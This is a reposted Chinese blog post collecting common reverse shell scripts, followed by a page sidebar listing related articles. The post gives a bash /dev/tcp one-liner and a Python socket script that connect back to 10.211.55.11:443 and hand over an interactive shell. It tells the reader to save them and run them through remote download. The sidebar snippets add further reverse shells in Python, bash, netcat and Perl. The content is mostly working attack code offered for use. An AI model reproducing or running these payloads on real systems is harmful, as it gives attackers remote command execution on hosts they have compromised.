常用的反弹shell脚本

最新推荐文章于 2024-06-01 11:15:00 发布
最新推荐文章于 2024-06-01 11:15:00 发布
阅读量130 收藏
点赞数
文章标签: 网络 shell python
原文链接:http://www.cnblogs.com/autopwn/p/6140651.html
版权

bash shell反弹脚本

/bin/bash -i > /dev/tcp/10.211.55.11/443 0<&1 2>&1

 

Python shell 反弹脚本

#!/usr/bin/python
# This is a Python reverse shell script

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.211.55.11",443));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

 

利用方式,保存成back.sh 或者back.py ,通过远程下载执行即可利用!

借鉴:

https://jivoi.github.io/2015/07/01/pentest-tips-and-tricks/

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

转载于:https://www.cnblogs.com/autopwn/p/6140651.html

weixin_30606461
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
AWD-Web 工具资料集合.zip
11-24
AWD一条龙 攻防常用脚本+不死马+crontab+防御方法,不死马,反弹shell,可扩展批量攻击脚本,文件监控,预留后门利用,常用密码,弱口令,反弹shell,goby,fuzz,awd-watchbird防御,Xftp-7.0.0054p,Xshell-7.0.0054p,源码...
反弹shell汇总(超详细)
qq_52173020的博客
05-27 8296
反弹shell姿势大全,看这一篇就够啦~
反弹shell脚本
Soul Blog
11-23 3237
反弹shell及其脚本 一、反弹shell的各种姿势 python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.1",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-
【安全知识】——LInux的shell反弹姿势合集(更新中)
A_991128a的博客
06-01 1078
*作者名:白昼安全主页面链接:座右铭: 不要让时代的悲哀成为你的悲哀专研方向: web安全,后渗透技术每日鸡汤: **当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。下面给大家列举一些平时用的比较多的这里的演示环境为。
Linux简单渗透、反弹shell、常见脚本反弹方法
zhao__b的博客
11-26 2312
Linux简单渗透 这是我在课堂上做的一个小实验,首先电脑要有Java软件,没有去电脑管家下载一个,用于后期渗透。 第一步:打开软件点击管理,会出现让我们生成的界面,密码、密钥可以改,自己记住就行,这里我用的默认,有效载荷更具自己需求更改,这里我用的php,然后点击生成。 第二步:点击生成后会让我们选择一个存放文件地址,更具自己想放那放那,然后会在存放文件里生成一个php文件,右击我们用notepad++(这里我用的是notepad++)打开可以看到文件里的内容。 第三步:把刚才..
反弹 shell 脚本
eT48_Sec
02-09 626
从大马里面提取出来的,分别用perl 和 C实现 。 保存为reverse_exp,然后执行perl ./reverse_exp 192.168.1.111 13123。 在192.168.1.111 上执行 nc -v -l -p 13123 #!/usr/bin/perl use Socket; $cmd= "lynx"; $system= 'echo "`uname -a`
几种常见反弹shell汇总
秋叶依剑
11-10 1万+
0x01. bash 在攻击主机上执行端口监听: nc -lvvp port //port 为攻击主机端口号,并且此端口号没有被占用 在目标主机上执行: bash -i >& /dev/tcp/攻击主机ip/port 0>&1 //port 为攻击主机端口号 解释: bash -i 打开一个交互的bash >& 将标准...
GROTESQUE靶场复现
05-05
之后,通过上传反弹shell脚本并利用系统的定时任务机制,最终实现了从freddie用户到root用户的提权操作,成功获取了更高的权限和flag。 #### 总结 整个渗透测试过程展示了如何通过一系列技术手段逐步深入目标系统...
hw面试题,网络安全服务面试题,78页,近三万字,纯手工总结
最新发布
06-27
- **哈希传递攻击**: 利用NTLM Hash进行身份验证,实现无需明文密码即可远程登录或反弹Shell。 - **PsExec**: 实现直接连接攻击,便于快速部署木马或执行命令。 **5. 横向渗透命令执行手段** - **常用命令**: `...
Metasploit新手指南
10-09
本指南提供了关于如何使用Msfvenom生成payload参数的详解,并通过实例讲解了如何利用aspx脚本反弹shell并提权Windows服务器。 在高级应用方面,本指南还涵盖了如何使用msfvenom编码生成及https载荷、如何通过...
Python必备英语单词都在这儿了.docx
03-09
Python 编程中常用的英语单词解释 Python 是一种流行的编程语言,它广泛应用于数据分析、机器学习、人工智能等领域。学习 Python 需要了解一些基本的英语单词,这些单词是学习 Python 必备的。 1. 计算机科学领域...
【转】反弹Shell,看这一篇就够了
热门推荐
mastergu2的博客
10-26 2万+
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
linux下反弹shell的几种方法
Radiation's Blog
03-20 1万+
反弹的开始,我们需要使用nc在本地或者任意要反弹到的地方监听一个端口。最简单的做法是nc -l -p 8080,8080为要反弹的端口0x01—使用bashbash -i >& /dev/[tcp|udp]/10.1.1.19/8080 0>&1 注:该命令使用的是系统原生bash,[tcp|udp]是要使用的协议,一般选择tcp就行,10.1.1.19是你要反弹到的地址,如果要反弹到你的电脑上
linux 反弹脚本,linux反弹shell的原理详解
weixin_36219012的博客
04-30 298
完整命令反弹shell命令:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1bash -i > /dev/tcp/ip/port 0>&1 2>&1利用nc反弹shell:nc -lvvp 12345 -t -e /bin/bash原理bash -i > /dev/tcp/ip/port 0>&a...
10种反弹shell方式
kevinhanser
03-30 4904
参考链接1:http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet 参考链接2:https://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html 10种反弹shell方式 2019年3月30日【原创】 bash perl py...
反弹shell
stonesharp的专栏
04-03 3377
各种反弹shell的方式 - R00tGrok 时间 2014-04-06 23:27:00  博客园精华区原文  http://www.cnblogs.com/r00tgrok/p/reverse_shell_cheatsheet.html [前言:在乌云社区看到反弹shell的几种姿势,考虑到乌云社区不完全对外开放,干脆自己转一下以作分享,另外还收集了点其他的,应该较为全面
Linux反弹shell和常见脚本反弹
shangMD01的博客
11-29 149
0x01.bash 在攻击主机上进行监听,命令:nc -lvvp port //potr为攻击主机的端口号 ──(shang㉿bogon)-[~] └─$ nc -lvvp 1234 listening on [any] 1234 ... 在目标主机上执行,命令:bash -i>& /dev/tcp/攻击主机IP/port 0>&1 攻击主机的代码变为: ┌──(shang㉿bogon)-[~] └─$ nc -lvvp 1234 listenin...
linux下反弹shell
Xi4or0uji
09-25 1958
最近做了几题都是反弹shell,总结一哈 bash bash -i &gt;&amp; /dev/tcp/vps_ip/端口号 0&gt;&amp;1 bash -i 生成一个交互式的子进程 &amp;表示在Linux后台运行 /dev/tcp/vps_ip/端口号 其实是与主机建立tcp连接 /dev/[tcp|upd]/host/port是Linux里面比较特殊的文件,读取和写入相...
常见的反弹shell的方法以及对反弹shell的解释
qq_45584159的博客
03-04 1万+
文章目录一.什么是反弹shell,以及对反弹shell作用原理的解析:3.反弹shell的本质linux文件描述符重定向输入重定向输出重定向标准输出与标准错误输出重定向文件描述符的复制exec 绑定重定向对反弹shell执行的实例分析:>&、&>常见linux提权 一.什么是反弹shell,以及对反弹shell作用原理的解析: 1.定义 通俗来说,shell就是实现用户命令的接口,通过该接口我们能实现对计算机的控制(root权限), 而反弹shell就是将shell反弹给攻击者
Linux系统下Perl反弹Shell脚本解析
在安全领域,Perl也常用于编写渗透测试工具,如本例所示的反弹shell脚本。 3. **网络通信**:脚本使用了`Socket`模块进行网络通信,这是Perl内置的模块,可以创建套接字(socket)以便于进程间通信或者与远程主机...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值